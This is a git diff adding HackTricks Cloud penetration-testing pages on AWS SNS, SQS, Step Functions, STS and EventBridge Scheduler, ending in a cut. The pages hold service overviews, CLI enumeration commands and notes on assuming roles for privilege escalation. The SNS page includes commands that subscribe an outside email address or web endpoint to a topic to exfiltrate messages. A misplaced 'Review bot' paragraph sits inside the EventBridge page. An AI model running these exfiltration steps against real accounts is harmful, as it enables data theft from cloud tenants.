+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md new file mode 100644 index 0000000000..2c3753a360 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md @@ -0,0 +1,106 @@ +# AWS - SNS Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SNS + +Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. + +Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. + +### **Difference with SQS** + +**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ +On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ +While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. 
+ +### **Enumeration** + +```bash +# Get topics & subscriptions +aws sns list-topics +aws sns list-subscriptions +aws sns list-subscriptions-by-topic --topic-arn + +# Check privescs & post-exploitation +aws sns publish --region \ + --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ + --message file://message.txt + +# Exfiltrate through email +## You will receive an email to confirm the subscription +aws sns subscribe --region \ + --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ + --protocol email \ + --notification-endpoint my-email@example.com + +# Exfiltrate through web server +## You will receive an initial request with a URL in the field "SubscribeURL" +## that you need to access to confirm the subscription +aws sns subscribe --region \ + --protocol http \ + --notification-endpoint http:/// \ + --topic-arn +``` + +{% hint style="danger" %} +Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). + +Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. 
+{% endhint %} + +#### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md" %} +[aws-sns-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md) +{% endcontent-ref %} + +#### Privilege Escalation + +{% content-ref url="../aws-privilege-escalation/aws-sns-privesc.md" %} +[aws-sns-privesc.md](../aws-privilege-escalation/aws-sns-privesc.md) +{% endcontent-ref %} + +#### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-sns-post-exploitation.md" %} +[aws-sns-post-exploitation.md](../aws-post-exploitation/aws-sns-post-exploitation.md) +{% endcontent-ref %} + +#### Persistence + +{% content-ref url="../aws-persistence/aws-sns-persistence.md" %} +[aws-sns-persistence.md](../aws-persistence/aws-sns-persistence.md) +{% endcontent-ref %} + +## References + +* [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md new file mode 100644 index 0000000000..e4c4256699 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md @@ -0,0 +1,80 @@ +# AWS - SQS Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## SQS + +Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. + +### Enumeration + +```bash +# Get queues info +aws sqs list-queues +aws sqs get-queue-attributes --queue-url --attribute-names All + +# More about this in privesc & post-exploitation +aws sqs receive-message --queue-url + +aws sqs send-message --queue-url --message-body +``` + +{% hint style="danger" %} +Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. 
+{% endhint %} + +#### Unauthenticated Access + +{% content-ref url="../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md" %} +[aws-sqs-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md) +{% endcontent-ref %} + +#### Privilege Escalation + +{% content-ref url="../aws-privilege-escalation/aws-sqs-privesc.md" %} +[aws-sqs-privesc.md](../aws-privilege-escalation/aws-sqs-privesc.md) +{% endcontent-ref %} + +#### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-sqs-post-exploitation.md" %} +[aws-sqs-post-exploitation.md](../aws-post-exploitation/aws-sqs-post-exploitation.md) +{% endcontent-ref %} + +#### Persistence + +{% content-ref url="../aws-persistence/aws-sqs-persistence.md" %} +[aws-sqs-persistence.md](../aws-persistence/aws-sqs-persistence.md) +{% endcontent-ref %} + +## References + +* https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md new file mode 100644 index 0000000000..1ca042e366 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md @@ -0,0 +1,359 @@ +# AWS - Step Functions Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Step Functions + +AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL). + +## Key concepts + +### Standard vs. Express Workflows + +AWS Step Functions offers two types of **state machine workflows**: Standard and Express. + +* **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. +* **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. + +### States + +States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type: + +* **Task:** Executes a job, often using an AWS service like Lambda. +* **Choice:** Makes decisions based on input. +* **Fail/Succeed:** Ends the execution with a failure or success. +* **Pass:** Passes input to output or injects data. +* **Wait:** Delays execution for a set time. +* **Parallel:** Initiates parallel branches. +* **Map:** Dynamically iterates steps over items. 
+ +### Task + +A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs. + +* **Activities**: Custom workers you manage, suitable for long-running processes. + * Resource: **`arn:aws:states:region:account:activity:name`**. +* **Lambda Functions**: Executes AWS Lambda functions. + * Resource: **`arn:aws:lambda:region:account:function:function-name`**. +* **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. + * Resource: **`arn:partition:states:region:account:servicename:APIname`**. +* **HTTP Task**: Calls third-party APIs. + * Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. + +The following example shows a Task state definition that invokes a Lambda function called HelloWorld: + +```json +"HelloWorld": { + "Type": "Task", + "Resource": "arn:aws:states:::lambda:invoke", + "Parameters": { + "Payload.$": "$", + "FunctionName": "arn:aws:lambda:::function:HelloWorld" + }, + "End": true +} +``` + +### Choice + +A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results. + +* **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable. +* **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true. 
+ +Example of **Choice** state: + +```json +{ + "Variable": "$.timeStamp", + "TimestampEquals": "2000-01-01T00:00:00Z", + "Next": "TimeState" +} +``` + +### Fail/Succeed + +A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow. + +A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field. + +{% tabs %} +{% tab title="Fail example" %} +```json +"FailState": { + "Type": "Fail", + "Error": "ErrorName", + "Cause": "Error details" +} +``` +{% endtab %} + +{% tab title="Succeed example" %} +```json +"SuccessState": { + "Type": "Succeed" +} +``` +{% endtab %} +{% endtabs %} + +### Pass + +A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it. + +```json +"PassState": { + "Type": "Pass", + "Result": {"key": "value"}, + "ResultPath": "$.newField", + "Next": "NextState" +} +``` + +### Wait + +A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time: + +* **X Seconds**: A fixed number of seconds to wait. + + ```json + "WaitState": { + "Type": "Wait", + "Seconds": 10, + "Next": "NextState" + } + ``` +* **Absolute Timestamp**: An exact time to wait until. + + ```json + "WaitState": { + "Type": "Wait", + "Timestamp": "2024-03-14T01:59:00Z", + "Next": "NextState" + } + ``` +* **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**. 
+ + ```json + jsonCopiar código + "WaitState": { + "Type": "Wait", + "TimestampPath": "$.expirydate", + "Next": "NextState" + } + ``` + +### Parallel + +A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are: + +* **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine. +* **ResultPath**: Defines where (in the input) to place the combined output of the branches. +* **Retry and Catch**: Error handling configurations for the parallel state. + +```json +"ParallelState": { + "Type": "Parallel", + "Branches": [ + { + "StartAt": "Task1", + "States": { ... } + }, + { + "StartAt": "Task2", + "States": { ... } + } + ], + "Next": "NextState" +} +``` + +### Map + +A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes: + +* **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state. + + ```json + "MapState": { + "Type": "Map", + "ItemsPath": "$.arrayItems", + "ItemProcessor": { + "ProcessorConfig": { + "Mode": "INLINE" + }, + "StartAt": "AddState", + "States": { + "AddState": { + "Type": "Task", + "Resource": "arn:aws:states:::lambda:invoke", + "OutputPath": "$.Payload", + "Parameters": { + "FunctionName": "arn:aws:lambda:::function:add-function" + }, + "End": true + } + } + }, + "End": true + "ResultPath": "$.detail.added", + "ItemsPath": "$.added" + } + ``` +* **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. 
Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution. + + ```json + "DistributedMapState": { + "Type": "Map", + "ItemReader": { + "Resource": "arn:aws:states:::s3:getObject", + "Parameters": { + "Bucket": "my-bucket", + "Key": "data.csv" + } + }, + "ItemProcessor": { + "ProcessorConfig": { + "Mode": "DISTRIBUTED", + "ExecutionType": "EXPRESS" + }, + "StartAt": "ProcessItem", + "States": { + "ProcessItem": { + "Type": "Task", + "Resource": "arn:aws:lambda:region:account-id:function:my-function", + "End": true + } + } + }, + "End": true + "ResultWriter": { + "Resource": "arn:aws:states:::s3:putObject", + "Parameters": { + "Bucket": "myOutputBucket", + "Prefix": "csvProcessJobs" + } + } + } + ``` + +### Versions and aliases + +Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine. + +* **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version. +* **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). 
Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management. + +For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html). + +## IAM Roles for State machines + +AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions: + +* **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions. +* **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted. + +## Enumeration + +ReadOnlyAccess policy is enough for all the following enumeration actions. 
+ +```bash +# State machines # + +## List state machines +aws stepfunctions list-state-machines +## Retrieve informatio about the specified state machine +aws stepfunctions describe-state-machine --state-machine-arn + +## List versions for the specified state machine +aws stepfunctions list-state-machine-versions --state-machine-arn +## List aliases for the specified state machine +aws stepfunctions list-state-machine-aliases --state-machine-arn +## Retrieve information about the specified state machine alias +aws stepfunctions describe-state-machine-alias --state-machine-alias-arn + +## List executions of a state machine +aws stepfunctions list-executions --state-machine-arn [--status-filter ] [--redrive-filter ] +## Retrieve information and relevant metadata about a state machine execution (output included) +aws stepfunctions describe-execution --execution-arn +## Retrieve information about the state machine associated to the specified execution +aws stepfunctions describe-state-machine-for-execution --execution-arn +## Retrieve the history of the specified execution as a list of events +aws stepfunctions get-execution-history --execution-arn [--reverse-order | --no-reverse-order] [--include-execution-data | --no-include-execution-data] + +## List tags for the specified step Functions resource +aws stepfunctions list-tags-for-resource --resource-arn + +## Validate the definition of a state machine without creating the resource +aws stepfunctions validate-state-machine-definition --definition [--type ] + +# Activities # + +## List existing activities +aws stepfunctions list-activities +## Retrieve information about the specified activity +aws stepfunctions describe-activity --activity-arn + +# Map Runs # + +## List map runs of an execution +aws stepfunctions list-map-runs --execution-arn +## Provide information about the configuration, progress and results of a Map Run +aws stepfunctions describe-map-run --map-run-arn +## Lists executions of a Map Run +aws 
stepfunctions list-executions --map-run-arn [--status-filter ] [--redrive-filter ] +``` + +## Privesc + +In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-stepfunctions-privesc.md" %} +[aws-stepfunctions-privesc.md](../aws-privilege-escalation/aws-stepfunctions-privesc.md) +{% endcontent-ref %} + +## Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-stepfunctions-post-exploitation.md" %} +[aws-stepfunctions-post-exploitation.md](../aws-post-exploitation/aws-stepfunctions-post-exploitation.md) +{% endcontent-ref %} + +## Persistence + +{% content-ref url="../aws-persistence/aws-step-functions-persistence.md" %} +[aws-step-functions-persistence.md](../aws-persistence/aws-step-functions-persistence.md) +{% endcontent-ref %} + +## References + +* [https://docs.aws.amazon.com/service-authorization/latest/reference/list\_awsstepfunctions.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awsstepfunctions.html) +* [https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html](https://docs.aws.amazon.com/step-functions/latest/dg/welcome.html) +* [https://states-language.net/spec.html](https://states-language.net/spec.html) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md new file mode 100644 index 0000000000..ad755d1157 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md @@ -0,0 +1,126 @@ +# AWS - STS Enum + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## STS + +**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users). + +Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options. + +### Assume Role Impersonation + +The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN. + +For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard. + +#### Assume Role Logic + +In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::role/priv-role" + }, + "Action": "sts:AssumeRole", + "Condition": {} + } + ] +} +``` + +The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough). 
+ +However, if a role is allowing an account to assume it, like in: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "sts:AssumeRole", + "Condition": {} + } + ] +} +``` + +The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**. + +If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN). + +### Enumeration + +```bash +# Get basic info of the creds +aws sts get-caller-identity +aws sts get-access-key-info --access-key-id + +# Get CLI a session token with current creds +## Using CLI creds +## You cannot get session creds using session creds +aws sts get-session-token +## MFA +aws sts get-session-token --serial-number --token-code +``` + +### Privesc + +In the following page you can check how to **abuse STS permissions to escalate privileges**: + +{% content-ref url="../aws-privilege-escalation/aws-sts-privesc.md" %} +[aws-sts-privesc.md](../aws-privilege-escalation/aws-sts-privesc.md) +{% endcontent-ref %} + +### Post Exploitation + +{% content-ref url="../aws-post-exploitation/aws-sts-post-exploitation.md" %} +[aws-sts-post-exploitation.md](../aws-post-exploitation/aws-sts-post-exploitation.md) +{% endcontent-ref %} + +### Persistence + +{% content-ref url="../aws-persistence/aws-sts-persistence.md" %} +[aws-sts-persistence.md](../aws-persistence/aws-sts-persistence.md) +{% endcontent-ref %} + +## References + +* [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm\_source=pocket\_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist) + +{% 
hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md new file mode 100644 index 0000000000..c90be6f1dc --- /dev/null +++ b/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md @@ -0,0 +1,107 @@ +# AWS - EventBridge Scheduler Enum + +## EventBridge Scheduler + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
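Review bot: the trust-policy example in the STS hunk (the JSON block just before `### Enumeration`) has an invalid principal, `"AWS": "arn:aws:iam:::root"`: the account ID between the two colons is missing, so IAM rejects the document as written; it should read `arn:aws:iam::<account-id>:root`, and the empty `"Condition": {}` adds nothing and can be dropped. The paragraph below it has a broken bold span, `MUST to h**ave permissions to assume it**`, which should be `**MUST have permissions to assume it**`. Two CLI lines lost their arguments (`aws sts get-access-key-info --access-key-id` and `aws sts get-session-token --serial-number --token-code`), so placeholders are needed for them to be copy-pasteable, and the comment `You cannot get session creds using session creds` would be clearer as `GetSessionToken cannot be called with temporary (assumed-role or session) credentials`, which is the error STS actually returns. The reference URL also carries a `?utm_source=pocket_mylist` tracking parameter that should be stripped.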
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## EventBridge Scheduler + +**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets. + +There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." + +### Types of Schedules + +Types of Schedules in EventBridge Scheduler: + +1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC. +2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours. +3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM. + +Two Mechanisms for Handling Failed Events: + +1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure. +2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target. 
+ +### Targets + +There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API. + +**Templated targets** support the following services: + +* CodeBuild – StartBuild +* CodePipeline – StartPipelineExecution +* Amazon ECS – RunTask + * Parameters: EcsParameters +* EventBridge – PutEvents + * Parameters: EventBridgeParameters +* Amazon Inspector – StartAssessmentRun +* Kinesis – PutRecord + * Parameters: KinesisParameters +* Firehose – PutRecord +* Lambda – Invoke +* SageMaker – StartPipelineExecution + * Parameters: SageMakerPipelineParameters +* Amazon SNS – Publish +* Amazon SQS – SendMessage + * Parameters: SqsParameters +* Step Functions – StartExecution + +### Enumeration + +```bash +# List all EventBridge Scheduler schedules +aws scheduler list-schedules + +# List all EventBridge Scheduler schedule groups +aws scheduler list-schedule-groups + +# Describe a specific schedule to retrieve more details +aws scheduler get-schedule --name + +# Describe a specific schedule group +aws scheduler get-schedule-group --name + +# List tags for a specific schedule (helpful in identifying any custom tags or permissions) +aws scheduler 